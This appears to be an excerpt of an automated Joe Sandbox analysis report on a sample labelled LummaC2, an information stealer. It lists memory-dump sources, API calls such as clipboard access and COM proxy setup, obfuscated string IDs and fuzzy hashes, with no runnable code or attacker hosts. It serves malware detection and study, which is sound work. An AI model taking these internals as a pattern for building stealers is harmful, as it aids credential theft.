                                              • Instruction Fuzzy Hash: 2C121C219087E9C9DB32C67C8C087DDBFA15B63324F1843D9D4E96B2D2D7750A86CB62

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,$,$.$.$2$8$;$<$H$I$M$O$O$P$Q$X$]$]$^$a$b$c$h$m$m$t$v$w${$|$|$y
                                              • API String ID: 0-1314618608
                                              • Opcode ID: e38219a34bdc55aa6d4ea441d29cb5bd84c9d157b128e05656db25ee55b5437f
                                              • Instruction ID: 0b92479cbe13022fb6dcf7591d6a2c61b5766aa4b261edfd897b98bc2d3ca61a
                                              • Opcode Fuzzy Hash: e38219a34bdc55aa6d4ea441d29cb5bd84c9d157b128e05656db25ee55b5437f
                                              • Instruction Fuzzy Hash: 9F32D021908BEAC9DB32863C4C583DDBE611B67334F0847D9D1F96A3E2D3750A85CB66

                                              Control-flow Graph

                                              APIs
                                              • CoCreateInstance.OLE32(?,00000000,00000001,?,00000000), ref: 00E2DDDC
                                              • SysAllocString.OLEAUT32(09BB0FE3), ref: 00E2DE37
                                              • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00E2DE80
                                              • SysAllocString.OLEAUT32(25F52BC5), ref: 00E2DEF1
                                              • SysAllocString.OLEAUT32(346A3696), ref: 00E2E035
                                              • VariantInit.OLEAUT32(?), ref: 00E2E0AB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                              • String ID: On6l$QMNO$a2n0$an$if$zA
                                              • API String ID: 65563702-1173067894
                                              • Opcode ID: e324a232b5b53c0d8f690fc621a8a2cd5ca3b91a3498f24199a2104144f6f6a1
                                              • Instruction ID: d9dcff76904ab011063b9dfce659b036dd07ff00ca7eb4db814ac257bff81b69
                                              • Opcode Fuzzy Hash: e324a232b5b53c0d8f690fc621a8a2cd5ca3b91a3498f24199a2104144f6f6a1
                                              • Instruction Fuzzy Hash: 6742DB726083509FD324CF69D885BABBBE1EFC5314F18892CE5D99B390D778D8058B52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !s#m$"G7A$#o+i$6g,a$JM$NB$OJ$V3}-$XQZ[$c/~)$eMLO$mj$rOlm$rs$z+@%$~OG$K-U${u
                                              • API String ID: 0-1125961338
                                              • Opcode ID: 8226571744a96fa97b1e80eca7823e1f6a50d95f7f641314e5fcbfaced8a3190
                                              • Instruction ID: 4c318d06b5989cca78ccf5609f6260ecb203ab66138c83dda1b031fe1fc2390b
                                              • Opcode Fuzzy Hash: 8226571744a96fa97b1e80eca7823e1f6a50d95f7f641314e5fcbfaced8a3190
                                              • Instruction Fuzzy Hash: 8A723FB560C3848AD334CF25C452B9FBAF1FB91304F04882DD5D9AB252DBB5894ACB87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: &$1$5$7$>$@$E$S$w$y
                                              • API String ID: 0-3428255093
                                              • Opcode ID: fc321f4a1791fcbab2abf56301e3e8667368204623935bac10cdd6c2e1b1e760
                                              • Instruction ID: 4f107e24c6b915313e0d15f49af39840a49b248e06066823999edd421262ae0e
                                              • Opcode Fuzzy Hash: fc321f4a1791fcbab2abf56301e3e8667368204623935bac10cdd6c2e1b1e760
                                              • Instruction Fuzzy Hash: 6D72E372A0D7808BC3249B38C4953AFBBD1AFD5324F198A6EE5E9D73C1D63489418B53
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4N"L$5VwT$9B*@$>J6H$B*^($CvWt$D$P"J $Sz{x$VFgD$X2K0$fR/P$q^`\$}ZhX
                                              • API String ID: 0-2380368552
                                              • Opcode ID: 48f82d95e422fde914bd29569bd4b64c4f47fc8ce61d66d03b9b9cf84de30840
                                              • Instruction ID: 83af7f0b49934dacbc25b456f29add4eb060d7af51f57c8f247579372a87bc9d
                                              • Opcode Fuzzy Hash: 48f82d95e422fde914bd29569bd4b64c4f47fc8ce61d66d03b9b9cf84de30840
                                              • Instruction Fuzzy Hash: 3BB110B04083818FE7208F55C59576BBBF0FF81B48F64990CE2D91B2A1D3BA8545CF96
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ;$G$K$d$e$f$g
                                              • API String ID: 0-2683299700
                                              • Opcode ID: 6f71cef6164c61c64ed0dda4bcfa69b6f886b32440a47a020081c25c6539983c
                                              • Instruction ID: f4029abb7936af601fa6f3bb3934042ef0eddd5ae80d60994fd9211184cac36c
                                              • Opcode Fuzzy Hash: 6f71cef6164c61c64ed0dda4bcfa69b6f886b32440a47a020081c25c6539983c
                                              • Instruction Fuzzy Hash: 1C22D571A0C7808BD7249B38C4993AFBBE1AFD5324F198A6DD9DD973C1D63948808B53
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00E1689D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: 1R8P$<B<@$Eb6`$T$qE$t~$|N
                                              • API String ID: 237503144-4112981121
                                              • Opcode ID: 1c5a3617ad9919bc8cc2a8897e6a50d016e8d45686107563e9350e7bbeae94a9
                                              • Instruction ID: c211b34d6756f7aec1ef6a9ffaad1ce01507a617c65a2604b2368414fbe9baa5
                                              • Opcode Fuzzy Hash: 1c5a3617ad9919bc8cc2a8897e6a50d016e8d45686107563e9350e7bbeae94a9
                                              • Instruction Fuzzy Hash: 85D1A8B0508344CFD714CF25D8917ABBBE0FF85344F049A2CF696AB261E7799948CB92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: Clipboard$CloseDataGlobalLockOpen
                                              • String ID: :
                                              • API String ID: 1494355150-336475711
                                              • Opcode ID: 3d4cc2720217adb35ab01d1b754babaf9c04c9eee622812c9bc0d9981137e950
                                              • Instruction ID: 5a8476e05fc140c76daf3574adebf747540a4a081690877bd4137d941f3cc67c
                                              • Opcode Fuzzy Hash: 3d4cc2720217adb35ab01d1b754babaf9c04c9eee622812c9bc0d9981137e950
                                              • Instruction Fuzzy Hash: 4841907000C3948ED301EF78A5893AFBFE0AB92314F05592DE4C597282D7B9868CD763
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 3VWT$6B>@$>N4L$?J4H$M*C($^"Q $^.U,$e>K<$i2f0
                                              • API String ID: 0-2659819307
                                              • Opcode ID: 4e28bc82c008d61fb107412bc90b2a2e1e9e463b0861e97bb7c549b56df9c74f
                                              • Instruction ID: 1a7b1f3e0e4f3c640c762d90cb4b104ea4dd03e2861996abb249c1225691195f
                                              • Opcode Fuzzy Hash: 4e28bc82c008d61fb107412bc90b2a2e1e9e463b0861e97bb7c549b56df9c74f
                                              • Instruction Fuzzy Hash: 7B12AAB1201B05CFD3248F26D899BA7BBE5FB45314F008A2CD5AB9B6A1D7B4A409CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $w9q$*O$I$-C!M$3ga$4{;u$89$MO$s}
                                              • API String ID: 0-4109348952
                                              • Opcode ID: 469610386e9e130e566160deffeca5965b81de9de5f4b91836362665587acfae
                                              • Instruction ID: 216545c8ea9509ec79bf38c2902b09795bc5b71a807cb39c46faa4f4d6f4eb61
                                              • Opcode Fuzzy Hash: 469610386e9e130e566160deffeca5965b81de9de5f4b91836362665587acfae
                                              • Instruction Fuzzy Hash: A9C113756083408BD724CF24C8527ABB7F2FF95318F08A96CE9858F390E7789945CB96
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2v
                                              • API String ID: 0-665061728
                                              • Opcode ID: 14aaadc5267bb02bfde290e5494d3c85d8ded7ed0abc90d3a5385835dd7fe215
                                              • Instruction ID: a79aa84e27eacd213406c138bff8b47b9190ba4df72cc7a9afeca10bdabae0b5
                                              • Opcode Fuzzy Hash: 14aaadc5267bb02bfde290e5494d3c85d8ded7ed0abc90d3a5385835dd7fe215
                                              • Instruction Fuzzy Hash: 12A29A75A04B018FD725CF29C890B62BBF2FF85314F198A9DD4D68B7A1DB34A846CB50
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00E1C5C2
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 00E1C647
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: 8UVW$A)E+$B-
                                              • API String ID: 237503144-574032660
                                              • Opcode ID: c20afb510dab540fb4a30c77b077c13f8c457ceeb4fb73265bc491f9c267cc8a
                                              • Instruction ID: ebdd1a10d10cc67d089ba45c20f526999b7a4cb8908b27ee2ab442b7824999fc
                                              • Opcode Fuzzy Hash: c20afb510dab540fb4a30c77b077c13f8c457ceeb4fb73265bc491f9c267cc8a
                                              • Instruction Fuzzy Hash: E141DDB124C3549FE3248F20A89579FBBE2FBC5318F555A2CFA959B2D1C7718409CB82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %1[m$74$H$R$Jdy$y
                                              • API String ID: 0-571391843
                                              • Opcode ID: 7bed076e94966371b7358ca33232c82f17db0d72c3406526fb0ddda46e746f22
                                              • Instruction ID: ddd02f40e75f8e31f7ff5e9142fd153acb1f6272d61a5662735c1f8599052347
                                              • Opcode Fuzzy Hash: 7bed076e94966371b7358ca33232c82f17db0d72c3406526fb0ddda46e746f22
                                              • Instruction Fuzzy Hash: FFC1E37164C3448BD318DF25D8A176BBBE5EFC2314F14896DE2D28B391C639C509CB66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ]$^$_$q$r$s
                                              • API String ID: 0-2489591387
                                              • Opcode ID: 0f75e328841ccc03c93254b016c9416ebe5b564b7dc53aa819eb4c65bc48c22f
                                              • Instruction ID: 7d1114758760f6076937a16d68c9bee8744cc6b01796fc52c3d7f0f0947f2576
                                              • Opcode Fuzzy Hash: 0f75e328841ccc03c93254b016c9416ebe5b564b7dc53aa819eb4c65bc48c22f
                                              • Instruction Fuzzy Hash: EB5136B260C3908FD3148A78C89831BBFD19BD6328F09866DE1E5973C2D2B8D905C793
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d2ca7cd142508b826b9b737b315ef1ebd5f67abdadef39b2119a1e3626dac38
                                              • Instruction ID: 7eb91d23eb57d8b9f63ae90413ef0568b34010019c4f0c2c010ace332bd43067
                                              • Opcode Fuzzy Hash: 6d2ca7cd142508b826b9b737b315ef1ebd5f67abdadef39b2119a1e3626dac38
                                              • Instruction Fuzzy Hash: 1862BD75A04B018FD724CF29C890B62B7F2FF85314B198A9DD4D68B7A5EB34E846CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: )$)$IDAT$IEND$IHDR
                                              • API String ID: 0-3469842109
                                              • Opcode ID: 7d7919048267dcd36069a5edefc78129acd34931929b1490cdd6cf79c6a1c7fd
                                              • Instruction ID: f279b45e393f157c8c7d160c9e933cd7a4156b52568a30d68a5192f10328cfb2
                                              • Opcode Fuzzy Hash: 7d7919048267dcd36069a5edefc78129acd34931929b1490cdd6cf79c6a1c7fd
                                              • Instruction Fuzzy Hash: 540235716083889FD704CF29D89076B7BE1EF85304F19C56CEA859B392D379D909CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @6F$2H5N$3D3J$4p9v$az)"
                                              • API String ID: 0-2116903869
                                              • Opcode ID: 83f80cc6f4f077c17f8905f8911c2243940b04489ab33767af012e0f3bdd2b61
                                              • Instruction ID: 70972ab9149e15f49770356e2c9df31d4729628a33243d4afedb9d928fd7fcae
                                              • Opcode Fuzzy Hash: 83f80cc6f4f077c17f8905f8911c2243940b04489ab33767af012e0f3bdd2b61
                                              • Instruction Fuzzy Hash: 0BE19AB06007008FD724CF25C591B62BBF2FF95314B1996ADC49A8F7A6DB75E881CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                              • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                              • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: '&*F$2B61$5195$BA19$C535
                                              Strings
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: 245*$245*$avub$x${'~s
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: #\]R$'@=F$;DwZ$=L9B$?X%^
                                              APIs
                                              • FreeLibrary.KERNEL32(?), ref: 00E0AA37
                                              • FreeLibrary.KERNEL32(?), ref: 00E0AA74
                                                • Part of subcall function 00E323F0: LdrInitializeThunk.NTDLL(00E35730,?,00000018,?,?,00000018,?,?,?), ref: 00E3241E
                                              Strings
                                              Similarity
                                              • API ID: FreeLibrary$InitializeThunk
                                              • String ID: M/(
                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00E1B818
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,?), ref: 00E1B87D
                                              Strings
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: U1s3
                                              Strings
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: S"(w$S"(w$ctqv$f
                                              Strings
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: " ,9$"/)"
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: "*&$1+G)$;'+!$Y_{z
                                              Strings
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID:
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: Ds$]f$}v$y
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: edg$(RSP$5^>\$8V"T
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: EWKU$L^JS$S$X
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: 3*58$7+A!$_$y
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: 4$A$Y$z
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: 2?$b>$r>
                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: 3cmc$^A$djtc
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421845110.0000000000E3E000.00000004.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421864304.0000000000E47000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_df0000_LummaC2.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 2?$b>$r>
                                              • API String ID: 0-675963237
                                              • Opcode ID: 1edefc79851c9d34dc8e56cbdc348725b414255b0a4c4eab451cbc544fcbe347
                                              • Instruction ID: feb565cadf50c5be28ce3fbf860b4e17ff288fd264da1b1eeff8c8d538fac0c0
                                              • Opcode Fuzzy Hash: 1edefc79851c9d34dc8e56cbdc348725b414255b0a4c4eab451cbc544fcbe347
                                              • Instruction Fuzzy Hash: 44F10176609314CFC708CF29E89466ABBE2FBC8315F1A897CD885A7391D774D849CB81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3421773217.0000000000DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DF0000, based on PE: true
                                               • Associated: 00000002.00000002.3421752882.0000000000DF0000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421807059.0000000000E36000.00000002.00000001.01000000.00000006.sdmp
                                               • Associated: 00000002.00000002.3421826851.0000000000E39000.00000008.00000001.01000000.00000006.sdmp
